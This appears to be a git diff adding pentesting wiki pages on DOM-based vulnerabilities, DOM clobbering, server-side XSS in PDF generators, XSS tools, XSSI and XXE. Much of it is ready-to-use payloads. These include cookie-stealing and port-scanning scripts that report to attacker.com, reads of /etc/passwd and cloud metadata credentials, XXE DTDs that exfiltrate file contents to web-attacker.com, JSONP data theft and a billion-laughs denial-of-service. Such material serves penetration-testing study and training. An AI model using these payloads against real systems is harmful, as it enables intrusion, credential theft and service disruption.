+From: [https://portswigger.net/web-security/dom-based/link-manipulation](https://portswigger.net/web-security/dom-based/link-manipulation)
+
+#### How
+
+DOM-based link-manipulation vulnerabilities arise when a script writes **attacker-controllable data to a navigation target** within the current page, such as a clickable link or the submission URL of a form.
+
+#### Sinks
+
+```text
+someDOMElement.href
+someDOMElement.src
+someDOMElement.action
+```
+
+### Ajax request manipulation
+
+From: [https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation](https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation)
+
+#### How
+
+Ajax request manipulation vulnerabilities arise when a script writes **attacker-controllable data into the an Ajax request** that is issued using an `XmlHttpRequest` object.
+
+#### Sinks
+
+```text
+XMLHttpRequest.setRequestHeader()
+XMLHttpRequest.open()
+XMLHttpRequest.send()
+jQuery.globalEval()
+$.globalEval()
+```
+
+### Local file-path manipulation
+
+From: [https://portswigger.net/web-security/dom-based/local-file-path-manipulation](https://portswigger.net/web-security/dom-based/local-file-path-manipulation)
+
+#### How
+
+Local file-path manipulation vulnerabilities arise when a script passes **attacker-controllable data to a file-handling API** as the `filename` parameter. An attacker may be able to use this vulnerability to construct a URL that, if visited by another user, will cause the **user's browser to open/write an arbitrary local file**.
+
+#### Sinks
+
+```text
+FileReader.readAsArrayBuffer()
+FileReader.readAsBinaryString()
+FileReader.readAsDataURL()
+FileReader.readAsText()
+FileReader.readAsFile()
+FileReader.root.getFile()
+FileReader.root.getFile()
+```
+
+### Client-Side SQl injection
+
+From: [https://portswigger.net/web-security/dom-based/client-side-sql-injection](https://portswigger.net/web-security/dom-based/client-side-sql-injection)
+
+#### How
+
+Client-side SQL-injection vulnerabilities arise when a script incorporates **attacker-controllable data into a client-side SQL query in an unsafe way**.
+
+#### Sinks
+
+```text
+executeSql()
+```
+
+### HTML5-storage manipulation
+
+From: [https://portswigger.net/web-security/dom-based/html5-storage-manipulation](https://portswigger.net/web-security/dom-based/html5-storage-manipulation)
+
+#### How
+
+HTML5-storage manipulation vulnerabilities arise when a script **stores attacker-controllable data in the HTML5 storage** of the web browser \(either `localStorage` or `sessionStorage`\).  
+This **behavior does not in itself constitute a security vulnerability**. However, if the application later **reads data back from storage and processes it in an unsafe way**, an attacker may be able to leverage the storage mechanism to deliver other DOM-based attacks, such as cross-site scripting and JavaScript injection.
+
+#### Sinks
+
+```text
+sessionStorage.setItem()
+localStorage.setItem()
+```
+
+### XPath injection
+
+From: [https://portswigger.net/web-security/dom-based/client-side-xpath-injection](https://portswigger.net/web-security/dom-based/client-side-xpath-injection)
+
+#### How
+
+DOM-based XPath-injection vulnerabilities arise when a script incorporates **attacker-controllable data into an XPath query**.
+
+#### Sinks
+
+```text
+document.evaluate()
+someDOMElement.evaluate()
+```
+
+### Client-side JSON injection
+
+From: [https://portswigger.net/web-security/dom-based/client-side-json-injection](https://portswigger.net/web-security/dom-based/client-side-json-injection)
+
+#### How
+
+DOM-based JSON-injection vulnerabilities arise when a script incorporates **attacker-controllable data into a string that is parsed as a JSON data structure and then processed by the application**.
+
+#### Sinks
+
+```text
+JSON.parse()
+jQuery.parseJSON()
+$.parseJSON()
+```
+
+### Web-message manipulation
+
+From: [https://portswigger.net/web-security/dom-based/web-message-manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation)
+
+#### How
+
+Web-message vulnerabilities arise when a script sends **attacker-controllable data as a web message to another document** within the browser.  
+**Example** of vulnerable Web-message manipulation in [https://portswigger.net/web-security/dom-based/controlling-the-web-message-source](https://portswigger.net/web-security/dom-based/controlling-the-web-message-source)
+
+#### Sinks
+
+The `postMessage()` method for sending web messages can lead to vulnerabilities if the event listener for receiving messages handles the incoming data in an unsafe way.
+
+### DOM-data manipulation
+
+From: [https://portswigger.net/web-security/dom-based/dom-data-manipulation](https://portswigger.net/web-security/dom-based/dom-data-manipulation)
+
+#### How
+
+DOM-data manipulation vulnerabilities arise when a script writes **attacker-controllable data to a field within the DOM** that is used within the visible UI or client-side logic. An attacker may be able to use this vulnerability to construct a URL that, if visited by another user, will modify the appearance or behaviour of the client-side UI.
+
+#### Sinks
+
+```text
+scriptElement.src
+scriptElement.text
+scriptElement.textContent
+scriptElement.innerText
+someDOMElement.setAttribute()
+someDOMElement.search
+someDOMElement.text
+someDOMElement.textContent
+someDOMElement.innerText
+someDOMElement.outerText
+someDOMElement.value
+someDOMElement.name
+someDOMElement.target
+someDOMElement.method
+someDOMElement.type
+someDOMElement.backgroundImage
+someDOMElement.cssText
+someDOMElement.codebase
+document.title
+document.implementation.createHTMLDocument()
+history.pushState()
+history.replaceState()
+```
+
+### Denial of Service
+
+From: [https://portswigger.net/web-security/dom-based/denial-of-service](https://portswigger.net/web-security/dom-based/denial-of-service)
+
+#### How
+
+DOM-based denial-of-service vulnerabilities arise when a script passes **attacker-controllable data in an unsafe way to a problematic platform API**, such as an API whose invocation can cause the user's computer to consume **excessive amounts of CPU or disk space**. This may result in side effects if the browser restricts the functionality of the website, for example, by rejecting attempts to store data in `localStorage` or killing busy scripts.
+
+#### Sinks
+
+```text
+requestFileSystem()
+RegExp()
+```
+
+## **DOM Clobbering**
+
+A common pattern used by JavaScript developers is:
+
+`var someObject = window.someObject || {};`
+
+If you can control some of the HTML on the page, you can clobber the `someObject` reference with a DOM node, such as an anchor. Consider the following code:
+
+```python
+<script>
+ window.onload = function(){
+    let someObject = window.someObject || {};
+    let script = document.createElement('script');
+    script.src = someObject.url;
+    document.body.appendChild(script);
+ };
+</script>
+```
+
+To exploit this vulnerable code, you could inject the following HTML to clobber the `someObject` reference with an anchor element:
+
+`<a id=someObject><a id=someObject name=url href=//malicious-website.com/malicious.js>`
+
+Injecting that data `window.someObject.url` is going to be `href=//malicious-website.com/malicious.js`
+
+**Trick**:  `DOMPurify` allows you to use the **`cid:`** protocol, which **does not URL-encode double-quotes**. This means you can **inject an encoded double-quote that will be decoded at runtime**. Therefore, injecting something like `<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">` will make the HTML encoded `&quot;` to be **decoded on runtime** and **escape** from the attribute value to **create** the **`onerror`** event.
+
+Another common technique consists on using **`form`** element. Some client-side libraries will go through the attributes of the created form element to sanitised it. But, if you **create an `input`**inside the form with `id=attributes` , you will **clobber the attributes property** and the sanitizer **won't** be able to go through the **real attributes**.
+
diff --git a/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md b/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
new file mode 100644
index 00000000..f5923df1
--- /dev/null
+++ b/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
@@ -0,0 +1,113 @@
+# Server Side XSS \(Dynamic PDF\)
+
+## Server Side XSS \(Dynamic PDF\)
+
+If a web page is creating a PDF using user controlled input, you can try to **trick the bot** that is creating the PDF into **executing arbitrary JS code**.  
+So, if the **PDF creator bot finds** some kind of **HTML** **tags**, it is going to **interpret** them, and you can **abuse** this behaviour to cause a **Server XSS**.
+
+Please, notice that the `<script><\script>` tags don't work always, so you will need a different method to execute JS \(for example, abusing `<img` \).  
+Also, note that in a regular exploitation you will be **able to see/download the created pdf**, so you will be able to see everything you **write via JS** \(using `document.write()` for example\). But, if you **cannot see** the created PDF, you will probably need **extract the information making web request to you** \(Blind\).
+
+## Payloads
+
+### Discovery
+
+```markup
+<!-- Basic discovery, Write "test"-->
+<img src="x" onerror="document.write('test')" />
+
+<!--Basic blind discovery, load a resource-->
+<img src="http://attacker.com"/>
+<img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie">
+<script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script>
+<link rel=attachment href="http://attacker.com">
+```
+
+### Path disclosure
+
+```markup
+<!-- If the bot is accessing a file:// path, you will discover the internal path
+if not, you will at least have wich path the bot is accessing -->
+<img src="x" onerror="document.write(window.location)" />
+<script> document.write(window.location) </script>
+```
+
+### Load an external script
+
+The best conformable way to exploit this vulnerability is to abuse the vulnerability to make the bot load a script you control locally. Then, you will be able to change the payload locally and make the bot load it with the same code every time.
+
+```markup
+<script src="http://attacker.com/myscripts.js"></script>
+<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>
+```
+
+### Read local file
+
+```markup
+<script>
+x=new XMLHttpRequest;
+x.onload=function(){document.write(btoa(this.responseText))};
+x.open("GET","file:///etc/passwd");x.send();
+</script> 
+```
+
+```markup
+<iframe src=file:///etc/passwd></iframe>
+<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
+<link rel=attachment href="file:///root/secret.txt">
+```
+
+### Get external web page response as attachment \(metadata endpoints\)
+
+```markup
+<link rel=attachment href="http://http://169.254.169.254/latest/meta-data/iam/security-credentials/">
+```
+
+### Bot delay
+
+```markup
+<!--Make the bot send a ping every 500ms to check how long does the bot wait-->
+<script>
+    let time = 500;
+    setInterval(()=>{
+        let img = document.createElement("img");
+        img.src = `https://attacker.com/ping?time=${time}ms`;
+        time += 500;
+    }, 500);
+</script>
+<img src="https://attacker.com/delay">
+```
+
+### Port Scan
+
+```markup
+<!--Scan local port and receive a ping indicating which ones are found-->
+<script>
+const checkPort = (port) => {
+    fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
+        let img = document.createElement("img");
+        img.src = `http://attacker.com/ping?port=${port}`;
+    });
+}
+
+for(let i=0; i<1000; i++) {
+    checkPort(i);
+}
+</script>
+<img src="https://attacker.com/startingScan">
+```
+
+### [SSRF](../ssrf-server-side-request-forgery.md)
+
+This vulnerability can be transformed very easily in a SSRF \(as you can make the script load external resources\). So just try to exploit it \(read some metadata?\).
+
+## References
+
+{% embed url="https://lbherrera.github.io/lab/h1415-ctf-writeup.html" %}
+
+{% embed url="https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/" %}
+
+{% embed url="https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html" %}
+
+
+
diff --git a/pentesting-web/xss-cross-site-scripting/xss-tools.md b/pentesting-web/xss-cross-site-scripting/xss-tools.md
new file mode 100644
index 00000000..462e8b36
--- /dev/null
+++ b/pentesting-web/xss-cross-site-scripting/xss-tools.md
@@ -0,0 +1,53 @@
+# XSS Tools
+
+## XSStrike
+
+```text
+git clone https://github.com/s0md3v/XSStrike.git
+pip3 install -r XSStrike/requirements.txt
+```
+
+**Basic Usage\(Get\):**  
+python3 xsstrike.py --headers -u "http://localhost/vulnerabilities/xss\_r/?name=asd"  
+**Basic Usage\(Post\):**  
+python xsstrike.py -u "http://example.com/search.php" --data "q=query"  
+**Crawling\(depth=2 default\):**  
+python xsstrike.py -u "http://example.com/page.php" --crawl -l 3  
+**Find hidden parameters:**  
+python xsstrike.py -u "http://example.com/page.php" --params  
+**Extra:**  
+--headers \#Set custom headers \(like cookies\). It is necessary to set every time  
+--skip-poc  
+--skip-dom \#Skip DOM XSS scanning
+
+## BruteXSS
+
+```text
+git clone https://github.com/rajeshmajumdar/BruteXSS
+```
+
+Tool to find vulnerable \(GET or POST\) parameter to XSS using a list of payloads with a GUI.  
+Custom headers \(like cookies\) can not be configured.
+
+## XSSer
+
+[https://github.com/epsylon/xsser](https://github.com/epsylon/xsser)  
+Already installed in Kali.  
+Complete tool to find XSS.
+
+**Basic Usage\(Get\):**  
+  
+The tool doesnt send the payload:\(
+
+## XSSCrapy
+
+```text
+git clone https://github.com/DanMcInerney/xsscrapy
+```
+
+Not recommended. A lot of unnecessary output, and it doesn\`t work properly.
+
+## DalFOx
+
+[https://github.com/hahwul/dalfox](https://github.com/hahwul/dalfox)
+
diff --git a/pentesting-web/xssi-cross-site-script-inclusion.md b/pentesting-web/xssi-cross-site-script-inclusion.md
new file mode 100644
index 00000000..e1c462b0
--- /dev/null
+++ b/pentesting-web/xssi-cross-site-script-inclusion.md
@@ -0,0 +1,101 @@
+# XSSI \(Cross-Site Script Inclusion\)
+
+#### The information was taken from [https://www.scip.ch/en/?labs.20160414](https://www.scip.ch/en/?labs.20160414)
+
+## Basic Information
+
+XSSI designates a kind of vulnerability which exploits the fact that, when a resource is included using the `script` tag, the SOP doesn’t apply, because scripts have to be able to be included cross-domain. An attacker can thus read everything that was included using the `script` tag.
+
+ This is especially interesting when it comes to dynamic JavaScript or JSONP when so-called ambient-authority information like cookies are used for authentication. The cookies are included when requesting a resource from a different host.
+
+### Types
+
+1. Static JavaScript \(regular XSSI\)
+2. Static JavaScript, which is only accessible when authenticated
+3. Dynamic JavaScript
+4. Non-JavaScript
+
+## Regular XSSI
+
+The private information is located inside a global accessible JS file, you can just detect this by reading files, searching keywords or using regexps.  
+To exploit this, just include the script with private information inside the malicious content:
+
+```markup
+<script src="https://www.vulnerable-domain.tld/script.js"></script>
+<script> alert(JSON.stringify(confidential_keys[0])); </script>
+```
+
+## Dynamic-JavaScript-based-XSSI and Authenticated-JavaScript-XSSI
+
+**Confidential information is added to the script when a user requests it**. This can be easily discovered by sending the request **with and without the cookies**, if **different information** is retrieved, then confidential information could be contained. To do this automatically you can use burp extension: [https://github.com/luh2/DetectDynamicJS](https://github.com/luh2/DetectDynamicJS).
+
+If the information resides inside a global variable, you you can exploit it using the same code as for the the previous case.  
+If the confidential data is sent inside a JSONP response, you can override the executed function to retrieve the information:
+
+```markup
+<script>
+      //The confidential info will be inside the callback to angular.callbacks._7: angular.callbacks._7({"status":STATUS,"body":{"demographics":{"email":......}}})
+      var angular = function () { return 1; };
+      angular.callbacks = function () { return 1; };      
+      angular.callbacks._7 = function (leaked) {
+	  alert(JSON.stringify(leaked));
+      };  
+</script>
+<script src="https://site.tld/p?jsonp=angular.callbacks._7" type="text/javascript"></script>
+```
+
+Or you could also set a prepared function to be executed by the JSONP response:
+
+```markup
+<script>
+      leak = function (leaked) {
+	  alert(JSON.stringify(leaked));
+      };  
+</script>
+<script src="https://site.tld/p?jsonp=leak" type="text/javascript"></script>
+```
+
+If a variable does not reside inside the global namespace, sometimes this can be exploited anyway using _prototype tampering_. Prototype tampering abuses the design of JavaScript, namely that when interpreting code, JavaScript traverses the prototype chain to find the called property. The following example is extracted from the paper [The Unexpected Dangers of Dynamic JavaScript](https://www.usenix.org/system/files/conference/usenixsecurity15/sec15-paper-lekies.pdf) and demonstrates how overriding a relevant function of type `Array` and access to `this`, a non-global variable can be leaked as well.
+
+```javascript
+(function(){
+  var arr = ["secret1", "secret2", "secret3"];
+  // intents to slice out first entry
+  var x = arr.slice(1);
+  ...
+})();
+```
+
+In the original code `slice` from type `Array` accesses the data we’re interested in. An attacker can, as described in the preceding clause, override `slice` and steal the secrets.
+
+```javascript
+Array.prototype.slice = function(){
+  // leaks ["secret1", "secret2", "secret3"]
+  sendToAttackerBackend(this);
+};
+```
+
+Security Researcher [Sebastian Lekies](https://twitter.com/slekies) just recently updated his list of [vectors](http://sebastian-lekies.de/leak/).
+
+##  Non-Script-XSSI
+
+Takeshi Terada describes another kind of XSSI in his paper [Identifier based XSSI attacks](https://www.mbsd.jp/Whitepaper/xssi.pdf). He was able to leak Non-Script files cross-origin by including, among others, CSV files as source in the `script` tag, using the data as variable and function names.
+
+The first publicly documented XSSI attack was in 2006. Jeremiah Grossman’s blog entry [Advanced Web Attack Techniques using GMail](http://jeremiahgrossman.blogspot.ch/2006/01/advanced-web-attack-techniques-using.html) depicts a XSSI, which by overriding the `Array` constructor was able to read the complete address book of a google account.
+
+In 2007 Joe Walker published [JSON is not as safe as people think it is](http://incompleteness.me/blog/2007/03/05/json-is-not-as-safe-as-people-think-it-is/). He uses the same idea to steal JSON that is inside an `Array`.
+
+Other related attacks were conducted by injecting UTF-7 encoded content into the JSON to escape the JSON format. It is described by Gareth Heyes, author of [Hackvertor](https://hackvertor.co.uk/public), in the blog entry [JSON Hijacking](http://www.thespanner.co.uk/2011/05/30/json-hijacking/) released in 2011. In a quick test, this was still possible in Microsoft Internet Explorer and Edge, but not in Mozilla Firefox or Google Chrome.
+
+JSON with UTF-7:
+
+```javascript
+[{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJwBNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdwBpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAbwBiACcAOgAnAGQAbwBuAGU-'}]
+```
+
+Including the JSON in the attacker’s page
+
+```markup
+<script src="http://site.tld/json-utf7.json" type="text/javascript" charset="UTF-7"></script>
+```
+
diff --git a/pentesting-web/xxe-xee-xml-external-entity.md b/pentesting-web/xxe-xee-xml-external-entity.md
new file mode 100644
index 00000000..b259b6c5
--- /dev/null
+++ b/pentesting-web/xxe-xee-xml-external-entity.md
@@ -0,0 +1,606 @@
+# XXE - XEE - XML External Entity
+
+An XML External Entity attack is a type of attack against an application that parses XML input.
+
+## XML Basics
+
+**Most of this part was taken from this amazing Portswigger page:** [**https://portswigger.net/web-security/xxe/xml-entities**](https://portswigger.net/web-security/xxe/xml-entities)\*\*\*\*
+
+### What is XML? <a id="what-is-xml"></a>
+
+XML stands for "extensible markup language". XML is a language designed for storing and transporting data. Like HTML, XML uses a tree-like structure of tags and data. Unlike HTML, XML does not use predefined tags, and so tags can be given names that describe the data. Earlier in the web's history, XML was in vogue as a data transport format \(the "X" in "AJAX" stands for "XML"\). But its popularity has now declined in favor of the JSON format.
+
+### What are XML entities? <a id="what-are-xml-entities"></a>
+
+XML entities are a way of representing an item of data within an XML document, instead of using the data itself. Various entities are built in to the specification of the XML language. For example, the entities `&lt;` and `&gt;` represent the characters `<` and `>`. These are metacharacters used to denote XML tags, and so must generally be represented using their entities when they appear within data.
+
+### What are XML elements?
+
+Element type declarations set the rules for the type and number of elements that may appear in an XML document, what elements may appear inside each other, and what order they must appear in. For example:
+
+* `<!ELEMENT stockCheck ANY>` Means that any object could be inside the parent `<stockCheck></stockCheck>`
+* &lt;!ELEMENT stockCheck EMPTY&gt; Means that it should be empty `<stockCheck></stockCheck>`
+* &lt;!ELEMENT stockCheck \(productId,storeId\)&gt; Declares that `<stockCheck>` can have the children `<productId>` and `<storeId>`
+
+### What is document type definition? <a id="what-is-document-type-definition"></a>
+
+The XML document type definition \(DTD\) contains declarations that can define the structure of an XML document, the types of data values it can contain, and other items. The DTD is declared within the optional `DOCTYPE` element at the start of the XML document. The DTD can be fully self-contained within the document itself \(known as an "internal DTD"\) or can be loaded from elsewhere \(known as an "external DTD"\) or can be hybrid of the two.
+
+### What are XML custom entities? <a id="what-are-xml-custom-entities"></a>
+
+XML allows custom entities to be defined within the DTD. For example:
+
+`<!DOCTYPE foo [ <!ENTITY myentity "my entity value" > ]>`
+
+This definition means that any usage of the entity reference `&myentity;` within the XML document will be replaced with the defined value: "`my entity value`".
+
+### What are XML external entities? <a id="what-are-xml-external-entities"></a>
+
+XML external entities are a type of custom entity whose definition is located outside of the DTD where they are declared.
+
+The declaration of an external entity uses the `SYSTEM` keyword and must specify a URL from which the value of the entity should be loaded. For example:
+
+`<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://normal-website.com" > ]>`
+
+The URL can use the `file://` protocol, and so external entities can be loaded from file. For example:
+
+`<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///path/to/file" > ]>`
+
+XML external entities provide the primary means by which [XML external entity attacks](https://portswigger.net/web-security/xxe) arise.
+
+### What are XML Parameter entities?
+
+Sometimes, XXE attacks using regular entities are blocked, due to some input validation by the application or some hardening of the XML parser that is being used. In this situation, you might be able to use XML parameter entities instead. XML parameter entities are a special kind of XML entity which can only be referenced elsewhere within the DTD. For present purposes, you only need to know two things. First, the declaration of an XML parameter entity includes the percent character before the entity name:
+
+`<!ENTITY % myparameterentity "my parameter entity value" >`
+
+And second, parameter entities are referenced using the percent character instead of the usual ampersand: `%myparameterentity;`
+
+This means that you can test for blind XXE using out-of-band detection via XML parameter entities as follows:
+
+`<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]>`
+
+This XXE payload declares an XML parameter entity called `xxe` and then uses the entity within the DTD. This will cause a DNS lookup and HTTP request to the attacker's domain, verifying that the attack was successful.
+
+## Main attacks
+
+[Most of these attacks were tasted using the awesome Portswiggers XEE labs: https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)
+
+### New Entity test
+
+In this attack I'm going to test if a simple new ENTITY declaration is working
+
+```markup
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [<!ENTITY toreplace "3"> ]>
+<stockCheck>
+	<productId>&toreplace;</productId>
+	<storeId>1</storeId>
+</stockCheck>
+```
+
+![](../.gitbook/assets/image%20%2820%29.png)
+
+### Read file
+
+Lets try to read `/etc/passwd` in different ways. For Windows you could try to read: `C:\windows\system32\drivers\etc\hosts`
+
+In this first case notice that SYSTEM "_**file:///**etc/passwd_" will also work.
+
+```markup
+<!--?xml version="1.0" ?-->
+<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
+<data>&example;</data>
+```
+
+![](../.gitbook/assets/image%20%28264%29.png)
+
+This second case should be useful to extract a file if the web server is using PHP \(Not the case of Portswiggers labs\)
+
+```markup
+<!--?xml version="1.0" ?-->
+<!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
+<data>&example;</data>
+```
+
+In this third case notice we are declaring the `Element stockCheck` as ANY
+
+```markup
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE data [
+<!ELEMENT stockCheck ANY>
+<!ENTITY file SYSTEM "file:///etc/passwd">
+]>
+<stockCheck>
+	<productId>&file;</productId>
+	<storeId>1</storeId>
+</stockCheck3>
+```
+
+![](../.gitbook/assets/image%20%2832%29.png)
+
+### SSRF
+
+An XXE could also bu used to abuse a SSRF inside a cloud
+
+```markup
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
+<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
+```
+
+### Blind SSRF
+
+Using the **previously commented technique** you can make the server access a server you control to show it's vulnerable. But, if that's not working, maybe is because **XML entities aren't allowed**, in that cause you could try using **XML parameter entities**:
+
+```markup
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://gtd8nhwxylcik0mt2dgvpeapkgq7ew.burpcollaborator.net"> %xxe; ]>
+<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
+```
+
+### "Blind" SSRF - Exfiltrate data out-of-band
+
+**In this occasion we are going to make the server load a new DTD with a malicious payload that will send the content of a file via HTTP request \(for multi-line files you could try to ex-filtrate it via** _**ftp://**_**\). This explanation as taken from** [**Portswiggers lab here**](https://portswigger.net/web-security/xxe/blind)**.**
+
+An example of a malicious DTD to exfiltrate the contents of the `/etc/hostname` file is as follows:
+
+```markup
+<!ENTITY % file SYSTEM "file:///etc/hostname">
+<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
+%eval;
+%exfiltrate;
+```
+
+This DTD carries out the following steps:
+
+* Defines an XML parameter entity called `file`, containing the contents of the `/etc/passwd` file.
+* Defines an XML parameter entity called `eval`, containing a dynamic declaration of another XML parameter entity called `exfiltrate`. The `exfiltrate` entity will be evaluated by making an HTTP request to the attacker's web server containing the value of the `file` entity within the URL query string.
+* Uses the `eval` entity, which causes the dynamic declaration of the `exfiltrate` entity to be performed.
+* Uses the `exfiltrate` entity, so that its value is evaluated by requesting the specified URL.
+
+The attacker must then host the malicious DTD on a system that they control, normally by loading it onto their own webserver. For example, the attacker might serve the malicious DTD at the following URL:  
+`http://web-attacker.com/malicious.dtd`
+
+Finally, the attacker must submit the following XXE payload to the vulnerable application:
+
+```markup
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>
+<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
+```
+
+This XXE payload declares an XML parameter entity called `xxe` and then uses the entity within the DTD. This will cause the XML parser to fetch the external DTD from the attacker's server and interpret it inline. The steps defined within the malicious DTD are then executed, and the `/etc/passwd` file is transmitted to the attacker's server.
+
+### Error Based\(External DTD\)
+
+**In this case we are going to make the server loads a malicious DTD that will show the content of a file inside an error message \(this is only valid if you can see error messages\).** [**Example from here.**](https://portswigger.net/web-security/xxe/blind)\*\*\*\*
+
+You can trigger an XML parsing error message containing the contents of the `/etc/passwd` file using a malicious external DTD as follows:
+
+```markup
+<!ENTITY % file SYSTEM "file:///etc/passwd">
+<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
+%eval;
+%error;
+```
+
+This DTD carries out the following steps:
+
+* Defines an XML parameter entity called `file`, containing the contents of the `/etc/passwd` file.
+* Defines an XML parameter entity called `eval`, containing a dynamic declaration of another XML parameter entity called `error`. The `error` entity will be evaluated by loading a nonexistent file whose name contains the value of the `file` entity.
+* Uses the `eval` entity, which causes the dynamic declaration of the `error` entity to be performed.
+* Uses the `error` entity, so that its value is evaluated by attempting to load the nonexistent file, resulting in an error message containing the name of the nonexistent file, which is the contents of the `/etc/passwd` file.
+
+Invoke the external DTD error with: 
+
+```markup
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>
+<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
+```
+
+And you should see the contents of the file inside error message of the response of the web server.
+
+![](../.gitbook/assets/image%20%28143%29.png)
+
+_**Please notice that external DTD allows us to include one entity inside the second \(`eval`\), but it is prohibited in the internal DTD. Therefore, it doesn't work to force the error without using an external DTD \(usually\).**_
+
+### **Error Based \(local DTD\)**
+
+So what about blind XXE vulnerabilities when **out-of-band interactions are blocked** \(external connections aren't available\)?. [Information from here](https://portswigger.net/web-security/xxe/blind).
+
+In this situation, it might still be possible to **trigger error messages containing sensitive data**, due to a loophole in the XML language specification. If a document's **DTD uses a hybrid of internal and external DTD** declarations, then the **internal DTD can redefine entities that are declared in the external DTD**. When this happens, the restriction on using an XML parameter entity within the definition of another parameter entity is relaxed.
+
+This means that an attacker can employ the **error-based XXE technique from within an internal DTD**, provided the XML parameter entity that they use is **redefining an entity that is declared within an external DTD**. Of course, if out-of-band connections are blocked, then the external DTD cannot be loaded from a remote location. Instead, it needs to be an **external DTD file that is local to the application server**. _Essentially, the attack involves invoking a DTD file that happens to exist on the local filesystem and repurposing it to redefine an existing entity in a way that triggers a parsing error containing sensitive data._
+
+For example, suppose there is a DTD file on the server filesystem at the location `/usr/local/app/schema.dtd`, and this DTD file defines an entity called `custom_entity`. An attacker can trigger an XML parsing error message containing the contents of the `/etc/passwd` file by submitting a hybrid DTD like the following:
+
+```markup
+<!DOCTYPE foo [
+    <!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
+    <!ENTITY % custom_entity '
+        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
+        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
+        &#x25;eval;
+        &#x25;error;
+    '>
+    %local_dtd;
+]>
+```
+
+This DTD carries out the following steps:
+
+* Defines an XML parameter entity called `local_dtd`, containing the contents of the external DTD file that exists on the server filesystem.
+* Redefines the XML parameter entity called `custom_entity`, which is already defined in the external DTD file. The entity is redefined as containing the [error-based XXE exploit](https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages) that was already described, for triggering an error message containing the contents of the `/etc/passwd` file.
+* Uses the `local_dtd` entity, so that the external DTD is interpreted, including the redefined value of the `custom_entity` entity. This results in the desired error message.
+
+ **Real world example:** Systems using the GNOME desktop environment often have a DTD at `/usr/share/yelp/dtd/docbookx.dtd` containing an entity called `ISOamso`
+
+```markup
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [
+	<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
+	<!ENTITY % ISOamso '
+		<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
+		<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
+		&#x25;eval;
+		&#x25;error;
+	'>
+	%local_dtd;
+]>
+<stockCheck><productId>3;</productId><storeId>1</storeId></stockCheck>
+```
+
+![](../.gitbook/assets/image%20%2868%29.png)
+
+As this technique uses an **internal DTD you need to find a valid one first**. You could do this **installing** the same **OS / Software** the server is using and **searching some default DTDs**, or **grabbing a list** of **default DTDs** inside systems and **check** if any of them exists:
+
+```markup
+<!DOCTYPE foo [
+<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
+%local_dtd;
+]>
+```
+
+### DoS
+
+#### Billion Laugh Attack
+
+```markup
+<!DOCTYPE data [
+<!ENTITY a0 "dos" >
+<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
+<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
+<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
+<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
+]>
+<data>&a4;</data>
+```
+
+#### Yaml Attack
+
+```markup
+a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
+b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
